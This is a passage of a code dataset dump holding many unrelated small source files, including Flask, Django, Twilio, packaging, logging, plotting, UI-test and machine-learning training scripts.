i.replace(\"s\",\"\").replace(\"to\",\",\").split(\",\")\n\t\t\tblocks_sig_conv.append(x)\n\t\tfor i in blocks_sig_conv:\n\t\t\ti = map(int, i)\n\t\t\tif i not in blocks_sig_int:\n\t\t\t\tblocks_sig_int.append(i)\n\t\tblocks_sig_int.sort()\n\t\twith open(prefix+\"BlocksSigUnique.txt\", 'w') as output_handle:\n\t\t\toutput_handle.write(\"Start,Stop\\n\")\n\t\t\tfor i in blocks_sig_int:\n\t\t\t\toutput_handle.write(str(i).replace(\"[\",\"\").replace(\"]\",\"\").replace(\" \",\"\")+'\\n')\n\nget_unique(args.site_boundaries, args.output_prefix)\n","sub_path":"GetUniqueBlocks.py","file_name":"GetUniqueBlocks.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"43587966","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nfrom flask import Flask,render_template\napp=Flask(__name__)\n@app.route(\"/\")\ndef start():\n name=\"liningsheg\"\n return render_template('index.html',name=name)\nif __name__=='__main__':\n app.run(host=\"0.0.0.0\",port=5000,debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103789316","text":"# Download the Python helper library from twilio.com/docs/python/install\nfrom twilio.rest import Client\n\n# Your Account Sid and Auth Token from twilio.com/user/account\naccount_sid = \"ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\nauth_token = \"your_auth_token\"\nclient = Client(account_sid, auth_token)\n\ndata = {'number': \"001\", 'name': \"Bulbasaur\", 'attack': 49}\n\nlist_item = client.sync \\\n .services(\"ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\") \\\n .sync_lists(\"MyCollection\") \\\n .sync_list_items \\\n .create(data=data)\n\nprint(list_item.data)\n","sub_path":"sync/rest/lists/create-list-item/create-list-item.6.x.py","file_name":"create-list-item.6.x.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"54267381","text":"# -*- coding: utf-8 -*-\n# Copyright © 2015 Carl Chenet \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n\nfrom distutils.core import setup\nimport os.path\nimport platform\nimport sys\n\n# Warn the user about the supported Python versions\nif float(platform.python_version()[0:3]) < 3.4:\n print('You need at least Python 3.4 to use BackupChecker')\n sys.exit(1)\n\nCLASSIFIERS = [\n 'Intended Audience :: System Administrators',\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'License :: OSI Approved :: GNU General Public License (GPL)',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 3.4'\n]\n\nsetup(name = 'aom',\n version = '0.1',\n license = 'GNU GPL v3',\n description = 'converts a running Debian system to a Ansible role',\n long_description = 'ansible-o-matic converts a running Debian system to a Ansible role',\n classifiers = CLASSIFIERS,\n author = 'Carl Chenet',\n author_email = 'chaica@ohmytux.com',\n url = 'https://github.com/chaica/ansible-o-matic',\n download_url = 'https://github.com/chaica/ansible-o-matic',\n packages = ['aom'],\n data_files=[(os.path.join('share','man','man1'), ['man/aom.1'])],\n scripts = ['scripts/aom']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"350311079","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom blog.models import UserProfile\n\n\ndef words_validator(comment):\n if len(comment) < 1:\n raise ValidationError('一个字都不说不太好吧!')\n\n\ndef comment_validator(comment):\n INVALID_WORDS = ['傻b', '傻逼', '脑残', 'sb', '尼玛', '妈']\n if any(comment.__contains__(word) for word in INVALID_WORDS):\n raise ValidationError('艹,想骂人是不是!')\n\n\nclass CommentForm(forms.Form):\n comment = forms.CharField(widget=forms.Textarea(),\n error_messages={\n 'required': '一个字都不说不太好吧!'\n },\n validators=[words_validator, comment_validator]\n )\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField()\n password = forms.CharField()\n\n\nclass UserProfileForm(forms.ModelForm):\n error_css_class = 'error'\n\n class Meta:\n model = UserProfile\n fields = [\n 'profile_image', 'gender'\n ]\n\n labels = {\n 'profile_image': 'Image',\n 'gender': 'Gender',\n }\n\n widgets = {\n 'profile_image': forms.FileInput(\n attrs={'class': 'ui input'},\n )\n }\n","sub_path":"blog/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"171711062","text":"#!/usr/bin/env python3\n\nimport sys\nfrom collections import Counter\nimport argparse\nimport functools\nimport math\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('-v', dest=\"verbose\", default=False, action='store_true',\n help='Verbose output')\nparser.add_argument('--data', dest=\"data\", help='Specify data as an argument')\n\nargs = parser.parse_args()\n\nif args.data == None:\n buffer = sys.stdin.buffer.read()\nelse:\n buffer = args.data \ncounter = Counter(buffer)\n\nprobability = {}\nlength = len(buffer)\nfor key, value in counter.items():\n probability[key] = value/float(length)\n\nentropy = -sum(p* math.log(p, 2) for p in probability.values())\nif entropy == -0.0:\n entropy = 0\n\nif args.verbose != None:\n print(f\"{entropy}:{buffer.decode()}\")\nelse:\n print(entropy)\n","sub_path":"zsh/scripts/sentropy.py","file_name":"sentropy.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"603149718","text":"#!/usr/bin/env python\nimport os\nimport stat\nimport sys\nimport urllib.request\nimport zipfile\nimport platform\nfrom setuptools import setup\n\nVERSION = '1.0.1'\nTERRAFORM_VERSION = '0.12.6'\n\nwith open('README.md') as f:\n readme = f.read()\n\ndef download_terraform(platform='linux'):\n base_url = f'https://releases.hashicorp.com/terraform/{TERRAFORM_VERSION}'\n file_name = f'terraform_{TERRAFORM_VERSION}_{platform}_amd64.zip'\n download_url = f'{base_url}/{file_name}'\n\n download_directory = 'downloads'\n extract_directory = 'lib'\n target_file = f'{download_directory}/{file_name}'\n\n os.makedirs(download_directory, exist_ok=True)\n os.makedirs(extract_directory, exist_ok=True)\n\n if not os.path.exists(target_file):\n urllib.request.urlretrieve(download_url, target_file)\n\n with zipfile.ZipFile(target_file) as terraform_zip_archive:\n terraform_zip_archive.extractall(extract_directory)\n\n if platform == 'windows': \n new_executable_path = f'{extract_directory}/terraform_{platform}.exe'\n old_executable_path = f'{extract_directory}/terraform.exe'\n else:\n new_executable_path = f'{extract_directory}/terraform_{platform}'\n old_executable_path = f'{extract_directory}/terraform'\n\n if os.path.exists(new_executable_path):\n os.remove(new_executable_path)\n os.rename(old_executable_path, new_executable_path )\n\n executable_stat = os.stat(new_executable_path)\n os.chmod(new_executable_path, executable_stat.st_mode | stat.S_IEXEC)\n\ndownload_terraform(platform='linux')\ndownload_terraform(platform='windows')\ndownload_terraform(platform='darwin')\n\ntry:\n from wheel.bdist_wheel import bdist_wheel as _bdist_wheel\n class bdist_wheel(_bdist_wheel):\n def finalize_options(self):\n _bdist_wheel.finalize_options(self)\n self.root_is_pure = False\nexcept ImportError:\n bdist_wheel = None\n\nsetup(\n name='terraform-bin',\n version=VERSION,\n long_description=readme,\n long_description_content_type='text/markdown',\n author='Epiphany Team',\n author_email='',\n url='https://github.com/epiphany-platform/terraform-bin',\n license='Apache License Version 2.0',\n py_modules=['terraform'],\n data_files=[\n ('lib', ['lib/terraform_linux', 'lib/terraform_darwin', 'lib/terraform_windows.exe']),\n ],\n entry_points={\n 'console_scripts': [\n 'terraform = terraform:main',\n ]\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"198591462","text":"# #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/11/18 5:43 下午\n# @Author : 百变金刚\n# @Content : logging basic record\n# @Reference: https://www.cnblogs.com/Eva-J/articles/7228075.html#_label14\n# output2console; output2file; remove in time\nimport logging\nimport time\nfrom logging.handlers import TimedRotatingFileHandler\n\nimport yaml\n\n# 级别\t何时使用\n# DEBUG\t详细信息,一般只在调试问题时使用。(>=该level的log info将被输出)\n# INFO\t证明事情按预期工作。\n# WARNING\t(默认)某些没有预料到的事件的提示,或者在将来可能会出现的问题提示。例如:磁盘空间不足。但是软件还是会照常运行。\n# ERROR\t由于更严重的问题,软件已不能执行一些功能了。\n# CRITICAL\t严重错误,表明软件已不能继续运行了。\n\n# handler配置level不能生效\n# 在创建 handler之前将默认root logger的handler拉低\n# logging.root.setLevel(logging.NOTSET)\n\ndef test2Terminal():\n logging.basicConfig(format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s',\n level=logging.DEBUG)\n logging.debug('debug 信息')\n logging.info('info 信息')\n logging.warning('warning 信息')\n logging.error('error 信息')\n logging.critical('critial 信息')\n\ndef test2File():\n logging.basicConfig(\n level=logging.DEBUG,#控制台打印的日志级别\n filename='new.log',\n filemode='w',##模式,有w和a,w就是写模式,每次都会重新写日志,覆盖之前的日志\n #a是追加模式,默认如果不写的话,就是追加模式\n format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'\n #日志格式\n )\n logging.debug('debug 信息')\n logging.info('info 信息')\n logging.warning('warning 信息')\n logging.error('error 信息')\n logging.critical('critial 信息')\n\ndef testBoth():\n # !!! name, 指定了那么才会重新生成一个,不指定默认就只有一个(root)\n # logging的操作实际上是通过一个 logging.root 的对象的操作,level不过不指定默认为warning\n # 对于logging.getLogger(), 如果不显性的指定一个name,则默认返回logging.root 默认level为warning\n # 在对logger对象添加handler,且handler指定了level,Logger对logger的level的设置规则为选择更高级别的level,那么如果handler的级别低,则无法生效\n # 解决方法就是在自定义之前把logging,也就是logging.root的level设置为低级别,那么最终级别将取决于设定的handler\n # logging.root.setLevel(logging.NOTEST)\n # 有者将其封装进一个对象,该对象可以即又\n\n # 创建一个logger\n id=1\n logger = logging.getLogger('logger_{}'.format(id)) # 如果不指定name将不会新建logger,而是返回一个初始创建的公共logger\n\n # 创建一些设置\n formatter = logging.Formatter('%(levelname)-8s %(name)-12s: %(message)s') # 设置日志打印格式\n # 创建一个handler,用于写入日志文件\n fh = logging.FileHandler('logs/testboth.log')\n\n # 创建一个stream handler,用于输出到控制台\n ch = logging.StreamHandler() # 定义一个Handler打印INFO及以上级别的日志到sys.stderr\n\n # 绑定配置\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # 这个setLevel 不work\n fh.setLevel(logging.INFO)\n ch.setLevel(logging.INFO)\n\n # 为logger绑定输出handler\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n logger.info('all1')\n logger.debug('Quick zephyrs blow, vexing daft Jim.')\n logger.info('How quickly daft jumping zebras vex.')\n logger.warning('Jail zesty vixen who grabbed pay from quack.')\n logger.info('all2')\n logger.error('The five boxing wizards jump quickly.')\n # logger2.warning('Jail zesty vixen who grabbed pay from quack.')\n # logger2.error('The five boxing wizards jump quickly.')\n\ndef testBoth2():\n '''\n 不太秀美,写法上兼容'logging'\n :return:\n '''\n plog = 'logs/testboth.log'\n # 写log文件logging设定\n logging.basicConfig(\n level=logging.INFO, # log文件的level\n format='%(levelname)-8s %(asctime)s: %(message)s',\n datefmt='%m-%d %H:%M',\n filename=plog,\n filemode='w')\n # 输出到控制台的loging设定\n console = logging.StreamHandler() # 定义一个Handler打印INFO及以上级别的日志到sys.stderr\n console.setLevel(logging.INFO) # 控制台的level\n formatter = logging.Formatter('%(levelname)-8s: %(message)s') # 设置日志打印格式\n console.setFormatter(formatter)\n logging.getLogger().addHandler(console)\n\n# handler配置level不能生效\n# 在创建 handler之间将默认root logger的handler拉低\n# logging.root.setLevel(logging.NOTSET)\n\ndef testConfLog():\n logging_config_file = './conf/logging_config.yaml'\n\n # 设置日志\n with open(logging_config_file, 'r') as f:\n config = yaml.safe_load(f.read())\n\n logging.config.dictConfig(config)\n logger = logging.getLogger(__name__)\n logger.info('global log')\n\n# 写入多个logger\ndef test2variousfile():\n logger = logging.getLogger('alogger') # 如果不指定name将不会新建logger,而是返回一个初始创建的公共logger\n\n # 创建一些设置\n formatter = logging.Formatter('%(levelname)-8s %(name)-12s: %(message)s') # 设置日志打印格式\n # 创建一个handler,用于写入日志文件\n fh1 = logging.FileHandler('logs/various1.log')\n fh2 = logging.FileHandler('logs/various2.log')\n\n # 绑定配置\n fh1.setFormatter(formatter)\n fh2.setFormatter(formatter)\n\n # 为logger绑定输出handler\n logger.addHandler(fh1)\n logger.addHandler(fh2)\n\n logger.info('all1')\n logger.debug('Quick zephyrs blow, vexing daft Jim.')\n logger.info('How quickly daft jumping zebras vex.')\n logger.warning('Jail zesty vixen who grabbed pay from quack.')\n logger.info('all2')\n logger.error('The five boxing wizards jump quickly.')\n\n\n# 滚动日志,清除过期日志——TimedRotatingFileHandler\ndef testTimeRotatingLog():\n #日志打印格式\n log_fmt = '%(asctime)s\\tFile \\\"%(filename)s\\\",line %(lineno)s\\t%(levelname)s: %(message)s'\n formatter = logging.Formatter(log_fmt)\n #创建TimedRotatingFileHandler对象\n log_file_handler = TimedRotatingFileHandler(filename=\"logs/timerotate.log\", when=\"S\", interval=1, backupCount=1)\n #log_file_handler.suffix = \"%Y-%m-%d_%H-%M.log\"\n #log_file_handler.extMatch = re.compile(r\"^\\d{4}-\\d{2}-\\d{2}_\\d{2}-\\d{2}.log$\")\n log_file_handler.setFormatter(formatter)\n logging.basicConfig(level=logging.INFO)\n log = logging.getLogger('timeRotate')\n log.addHandler(log_file_handler)\n #循环打印日志\n log_content = \"test log\"\n count = 1\n while count < 500:\n log.error('No.{} log'.format(count))\n time.sleep(0.01)\n count = count + 1\n # log.removeHandler(log_file_handler)\n\n '''\n filename:日志文件名的prefix;\n when:是一个字符串,用于描述滚动周期的基本单位,字符串的值及意义如下:\n “S”: Seconds\n “M”: Minutes\n “H”: Hours\n “D”: Days\n ���W”: Week day (0=Monday),这里应该为 when='W0' or W1 W2 ,,,\n “midnight”: Roll over at midnight\n interval: 滚动周期,单位有when指定,比如:when=’D’,interval=1,表示每天产生一个日志文件;\n backupCount: 表示日志文件的保留个数,超过之后会依次删除最早创建的,=0就不会删除。。。\n !!!程序停止再次启动能把上次的接上,emmm,很nice\n '''\n\n\nif __name__ == '__main__':\n test2variousfile()\n # testTimeRotatingLog()\n # testConfLog()\n # testBoth()\n # test2Terminal()\n # test2File()","sub_path":"tools/logginglog/t01test.py","file_name":"t01test.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"511372390","text":"import pygame\n\n# Create a blank game window\nclass Window:\n pygame.display.init()\n\n def __init__(self, x, y, caption):\n self.x = x\n self.y = y\n\n displayFlags = pygame.DOUBLEBUF\n\n self.window = pygame.display.set_mode([x, y], displayFlags)\n self.caption = pygame.display.set_caption(caption)\n self.clock = pygame.time.Clock()\n\n # Keep track of the high score in the current running of the game\n self.highScore = 0\n\n def setFPS(self, num):\n self.clock.tick(num)\n","sub_path":"src/core/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"175220068","text":"import subprocess as sb\nimport sys, re, os\n\nxrootd = 'root://eoslhcb.cern.ch/'\n\ndef remotels_simple_py3(location,pattern = '',opt='') :\n out = sb.check_output(\"xrdfs \"+xrootd+\" ls \"+location, shell=True).decode(\"utf-8\") \n out = out.split('\\n')\n out = [ x.replace(xrootd,'') for x in out if len(x) > 0 ]\n out = [ x for x in out if len(re.findall(pattern,x)) > 0 or pattern=='' ]\n if 'noxrd' not in opt : out = [ xrootd+x for x in out ]\n return out\n\ndef remotels_simple(location,pattern = '',opt='') :\n out = sb.check_output(\"xrdfs \"+xrootd+\" ls \"+location, shell=True)\n out = out.split('\\n')\n out = [ x.replace(xrootd,'') for x in out if len(x) > 0 ]\n out = [ x for x in out if len(re.findall(pattern,x)) > 0 or pattern=='' ]\n if 'noxrd' not in opt : out = [ xrootd+x for x in out ]\n return out\n\ndef remotels_allpy(location,pattern='',opt='') :\n\n import sys\n if sys.version_info.major > 2 : return remotels_simple_py3(location,pattern,opt)\n else : return remotels_simple(location,pattern,opt)\n\ndef remotels(locations,pattern='',levels=0) :\n \n folders = []\n lev = 0\n tmpfolders = locations\n while lev < levels :\n newfolders = []\n for tmp in tmpfolders :\n try : newfolders.extend(remotels_allpy(tmp,opt='noxrd'))\n except : continue\n tmpfolders = newfolders\n lev += 1\n \n files = [] \n for tmp in tmpfolders :\n try : files.extend(remotels_allpy(tmp,pattern))\n except : continue\n\n return files\n\ndef remote_ls_fromids(dataids) :\n \n base = dataids[0]\n ids = dataids[1]\n locs = [ base + str(i) for i in ids ]\n return remotels(locs,levels=1,pattern='(.root)')\n\nif __name__ == '__main__' :\n\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\",\"--path\",default = None)\n args = parser.parse_args()\n\n remote_ls(path)\n\n\n","sub_path":"pyutils/scripts/remotels.py","file_name":"remotels.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"31652381","text":"# Python Programming.\n# Homework 2, problem 1\n# Instructor: Dr. Ionut Cardei\n# Do not distribute.\n\n# a) The algorithm:\n# 1. read string n_str from terminal\n# 2. convert n_str to int n\n# 3. if conversion fails or n <=0,\n# 3.1 print error message: \"Error: n must be positive integer\"\n# 3.2 exit program\n# 4. for a=1, a<=n, a++\n# 4.1 for b=1, a<=int(sqrt(n*n - a*a)), a++\n# 4.1 hyp_sq = a**2 + b**2\n# 4.2 c = sqrt(hyp_sq)\n# 4.3 if c == int(sqrt(hyp_sq))\n# 4.3.1 print(a,b,c)\n\n\n# now in Python:\n\nimport math\n\nn_str = input(\"Enter n: \")\n# assume this represents an int number\nn = int(n_str) # ... so this expression succeeds.\n\nif (n < 0):\n print(\"Error: n must be positive integer\")\n exit(1)\n\nfor a in range(1, n+1):\n bmax = int(math.sqrt(n**2 - a**2))\n for b in range(1, bmax + 1):\n hyp_sq = a**2 + b**2\n c_float = math.sqrt(hyp_sq)\n\n # if c is an int (a whole number):\n if c_float == int(math.sqrt(hyp_sq)):\n # no need to check for c<=n since b is limited\n c = int(c_float)\n print(a, b, c)\n","sub_path":"find-duplicates/h2_find-duplicates_pylab/h2-solutions/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"534785105","text":"from core.models import Tweet\nfrom tastypie.resources import ModelResource\n\n\nclass TweetResource(ModelResource):\n class Meta(object):\n queryset = Tweet.objects.all()\n resource_name = 'tweets'\n allowed_methods = []\n fields = ['text', 'created_at', 'twitter_id', 'from_user', 'link']\n always_return_data = True\n","sub_path":"api/resources/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"162417343","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom pylab import figure, axes, pie, title, show\n\n\n\nx, y = np.loadtxt('Präzession.txt', unpack=True,delimiter=',')\n\ndef f(x,a,b):\n return a*x+b\npopt, pcov = curve_fit(f, x, y)\nprint(popt)\nprint(pcov)\n\nx_new = np.linspace(x[0], x[-1], 500)\n\n\n\n\n\n\n\nplt.figure(1)\nplt.plot(x,y,'x', label = 'Messwerte')\nplt.plot(x_new,f(x_new,*popt),'-', label='Lineare Regression')\n\n\nplt.ylabel(r'$\\frac{1}{T}/\\frac{1}{s}$')\nplt.xlabel('$B /mT$')\nplt.grid()\nplt.legend()\n\nmü = 2*np.pi*9.25077298*10**(-7) *1.5494*10**(-3)\nprint(mü)\n\n\nplt.savefig('Präzession.pdf')\nprint ('Fertig')\n","sub_path":"AP1/V105_Magnetisches_Moment/graphen/Präzession/Präzession.py","file_name":"Präzession.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"347069193","text":"# -*- coding: utf-8 -*-\n\"\"\"比例与背景的基本操作测试用例.\"\"\"\nfrom iOS import script_ultils as sc\nimport time\nfrom unittest import TestCase\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom iOS import iOS_elements,base as ba\nfrom selenium.common.exceptions import TimeoutException\n\nclass TestProportion(TestCase):\n \"\"\"比例与背景的基本操作测试类.\"\"\"\n\n # 获取屏幕尺寸\n width, height = sc.get_size()\n img_path = sc.path_lists[0]\n\n @classmethod\n def setUpClass(cls):\n sc.driver.launch_app()\n time.sleep(3)\n\n @classmethod\n def tearDownClass(cls):\n time.sleep(3)\n sc.driver.close_app()\n\n def test_edit_proportion(self):\n '''剪辑-比例&多选.'''\n sc.logger.info('剪辑-比例')\n fun_name = 'test_edit_proportion'\n\n sc.logger.info('打开一个草稿视频')\n ba.home_first_click('更多草稿')\n\n sc.logger.info('点击草稿封面')\n ba.open_draft(iOS_elements.el_studio_draft)\n sc.capture_screen(fun_name, self.img_path)\n\n sc.logger.info('点击“镜头编辑”')\n WebDriverWait(sc.driver, 5, 1).until(\n lambda x: x.find_element_by_name(\"镜头编辑\")).click()\n sc.capture_screen(fun_name, self.img_path)\n\n sc.logger.info('点击\"比例\"')\n WebDriverWait(sc.driver, 5, 1).until(\n lambda x: x.find_element_by_name(\"比例\")).click()\n sc.capture_screen(fun_name, self.img_path)\n\n sc.logger.info('切换到\"比例tab\"')\n try:\n WebDriverWait(sc.driver, 5, 1).until(\n lambda x: x.find_element_by_name(iOS_elements.btn_bg_pro)).click()\n sc.capture_screen(fun_name, self.img_path)\n except TimeoutException:\n sc.logger.info('已经在\"比例tab\"')\n\n sc.logger.info('选择\"1:1 比例\"')\n el_proportion = \"vivavideo_edit_icon_proportion_1_1\"\n ba.clip_proportion(el_proportion)\n sc.capture_screen(fun_name, self.img_path)\n\n sc.logger.info('进入多选')\n try:\n WebDriverWait(sc.driver, 5, 1).until(\n lambda x: x.find_element_by_xpath('//XCUIElementTypeStaticText[@name=\"点击多选\"]')).click()\n sc.capture_screen(fun_name, self.img_path)\n except TimeoutException:\n sc.logger.info('当前工程只有一个镜头,无法进入多选')\n return True\n\n sc.logger.info('多选-删除')\n ba.clip_mult_select()\n sc.capture_screen(fun_name, self.img_path)\n\n sc.logger.info('点击“存草稿”按钮')\n WebDriverWait(sc.driver, 5, 1).until(\n lambda el: el.find_element_by_name(\"存草稿\")).click()\n sc.capture_screen(fun_name, self.img_path)\n sc.logger.info('剪辑-比例测试完成')","sub_path":"iOS/VivaVideo/test_creations/test_edit/test_proportion.py","file_name":"test_proportion.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"541578677","text":"#!/usr/bin/env python3\n# coding=utf-8\nimport numpy as np\nimport matplotlib.pyplot as plt\n\na = np.loadtxt('../results/test.txt')\na = np.transpose(a)\nplt.figure(1)\nplt.plot(a[0],a[1])\nplt.show()\n","sub_path":"plot/result_plot.py","file_name":"result_plot.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18439966","text":"import requests, sys\n\ndata = {'domain': open(sys.argv[1], 'r').read(),\n 'problem': open(sys.argv[2], 'r').read()}\n\nresp = requests.post('http://solver.planning.domains/solve',\n verify=False, json=data).json()\n\nfor i in resp['result']['plan']:\n\tprint(i['name'])\n\ndef dumPlan(domain_path, problem_path, name):\n\n\tdata = {'domain': open(domain_path, 'r').read(),\n 'problem': open(problem_path, 'r').read()}\n\n\tresp = requests.post('http://solver.planning.domains/solve',verify=False, json=data).json()\n\n\tfor i in resp['result']['plan']:\n\t\tprint(i['name'])\n","sub_path":"planner.py","file_name":"planner.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"385863231","text":"# coding: utf-8\n\n\nimport os\n\nimport pytest\n\nimport openslide\nfrom histolab.data import _has_hash, _load_svs, cmu_small_region, data_dir\n\nfrom ...fixtures import SVS\nfrom ...unitutil import function_mock\n\n\ndef test_data_dir():\n # data_dir should be a directory that can be used as a standard directory\n data_directory = data_dir\n assert \"cmu_small_region.svs\" in os.listdir(data_directory)\n\n\ndef test_cmu_small_region():\n \"\"\" Test that \"cmu_small_region\" svs can be loaded. \"\"\"\n cmu_small_region_image, path = cmu_small_region()\n assert cmu_small_region_image.dimensions == (2220, 2967)\n\n\ndef test_load_svs(request):\n file = SVS.CMU_1_SMALL_REGION\n _fetch = function_mock(request, \"histolab.data._fetch\")\n _fetch.return_value = file\n\n svs, path = _load_svs(file)\n\n assert type(svs) == openslide.OpenSlide\n assert path == file\n\n\n@pytest.mark.parametrize(\n \"file, hash, expected_value\",\n ((SVS.CMU_1_SMALL_REGION, \"1234abcd\", True), (\"/fake/file\", \"1234abcd\", False)),\n)\ndef it_knows_its_hash(request, file, hash, expected_value):\n file = file\n file_hash_ = function_mock(request, \"histolab.data.file_hash\")\n file_hash_.return_value = hash\n\n has_hash = _has_hash(file, hash)\n\n assert has_hash is expected_value\n","sub_path":"tests/unit/data/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"495019181","text":"import sqlite3\n\nclass DB:\n @classmethod\n def get_db(cls):\n return sqlite3.connect(\"./db.sqlite\")\n\n @classmethod\n def seed(cls):\n con = cls.get_db()\n con.cursor().execute('CREATE TABLE IF NOT EXISTS entries (date INTEGER NOT NULL, read INTEGER NOT NULL DEFAULT 0);')\n con.commit()\n con.close()\n\n @classmethod\n def add_entry(cls, date):\n con = cls.get_db()\n con.cursor().execute('INSERT INTO entries VALUES (?, 0);', (date,))\n con.commit()\n con.close()\n\n @classmethod\n def get_entries(cls, offset = 0, paginate_size = 10):\n con = cls.get_db()\n ret = con.cursor().execute('SELECT rowid, * FROM entries ORDER BY date DESC LIMIT ? OFFSET ?;', (paginate_size, paginate_size * offset)).fetchall()\n con.close()\n return ret\n\n @classmethod\n def count_entries(cls):\n con = cls.get_db()\n ret = con.cursor().execute('SELECT COUNT(*) FROM entries;').fetchone()\n con.close()\n return ret\n\n @classmethod\n def mark_read(cls, id):\n con = cls.get_db()\n con.cursor().execute('UPDATE entries SET read = 1 WHERE rowid = ?;', (id,))\n con.commit()\n con.close()\n\n @classmethod\n def mark_unread(cls, id):\n con = cls.get_db()\n con.cursor().execute('UPDATE entries SET read = 0 WHERE rowid = ?;', (id,))\n con.commit()\n con.close()\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"619264933","text":"#coding=utf-8\n\nimport torch\nimport torch.nn as nn\nimport torch.utils.data as data\nfrom torch.autograd import Variable as V\n\nimport cv2\nimport os\nimport numpy as np\nimport torch.backends.cudnn as cudnn\nimport models\n\nfrom models.seg_hrnet import HighResolutionNet\nfrom models.ccnet import ResNet\nimport argparse\nfrom time import time\nimport sys\nfrom framework import MyFrame\nfrom loss.loss_sets import dice_bce_loss, CrossEntropy, FocalLoss, OhemCrossEntropy, CriterionDSN\nfrom dataloader import ImageFolder\nfrom tensorboardX import SummaryWriter\nfrom config import config\nfrom config import update_config\nfrom test import TTAFrame\n# from loss.criterion import CriterionDSN, CriterionOhemDSN\n\n\n#更新参数代码\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train segmentation network')\n\n parser.add_argument('--cfg',\n help='experiment configure file name',\n required=True,\n type=str)\n parser.add_argument('opts',\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER)\n\n parser.add_argument('--local_rank', type=int, default=0)\n\n args = parser.parse_args()\n update_config(config, args)\n\n return args\n\n\nargs = parse_args()\n\nprint(\"-----start------\")\n\n#参数配置\n# cudnn related setting\ncudnn.benchmark = config.CUDNN.BENCHMARK\ncudnn.deterministic = config.CUDNN.DETERMINISTIC\ncudnn.enabled = config.CUDNN.ENABLED\n\nSHAPE = config.TRAIN.IMAGE_SIZE # size of input image\nROOT = config.ROOT #训练数据的存储位置\n#imagelist = filter(lambda x: x.find('sat')!=-1, os.listdir(ROOT))\nBATCHSIZE_PER_CARD = config.TRAIN.BATCHSIZE_PER_CARD\nCARD_NUM = config.TRAIN.CARD_NUM\nlr = config.TRAIN.LR\ntotal_epoch = config.TRAIN.TOTALEPOCH\n\nif config.USESYNCBN is True:\n ##syncBN分布式参数\n print(\"use syncBN\")\n world_size = CARD_NUM #GPU个数\n torch.distributed.init_process_group(\n 'nccl',\n init_method='env://',\n 